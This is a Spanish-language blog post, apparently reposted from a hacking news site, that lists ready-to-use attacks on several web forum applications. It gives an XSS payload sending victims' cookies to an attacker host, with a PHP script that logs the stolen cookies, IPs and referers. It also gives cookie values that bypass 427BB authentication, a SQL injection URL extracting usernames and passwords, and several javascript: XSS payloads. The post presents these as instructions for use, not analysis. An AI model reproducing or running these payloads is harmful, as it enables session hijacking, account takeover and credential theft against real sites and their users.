Vulnerabilidades en Aplicaciones...
Xoops Pool Module IMG Tag XSS
Introduce en un post este codigo:
< img src = " javascript:window.navigate%28"('hxxp://attacker.com/cookies.php? c=" +document.cook ie);"
y dentro de ¨cookies.php¨, ingresa lo siguiente:
/ ?
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?
-----------------------------------------------------------
NavBoard BBcode XSS
Ejemplo de BBcode:
Para V16(2.6.0)
[b]
[textlarge] <
Para V16(2.6.0) y V17beta2
[url=javascript:alert(123)]title[/url]
------------------------------------------------------------
427BB Multiple Vulnerabilities
427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)
1. Autentificacion bypass usando valores de cookie modificadas.
Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;
2. Ejemplo de SQL Injection.
Tiene que estar conectado como el usuario registrado.
http://host/bb427/showthread.php? ForumID=999% 20union%20select% 20UserName, Passwrod,null, null%20from% 20prefPersonal
3. Insercion de codigo script arbitrario.
postee un nuevo mensaje:.
Message text:
[url=javascript:alert(123)]clickme[/url]
------------------------------------------------------------
Proyecto Domus 'email' XSS
Ejemplo de URL:
http://host/domus/escribir.php? domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&amp;padre=1&categoria=General&n=&usario=username&email=e@\';% 20alert(123);% 20var%20dss=\'h.co&asunto=blabla&texto=anytext&accion=enviar
Fuente:hackers-news.com
Salu2
0 Comments:
Publicar un comentario
<< Home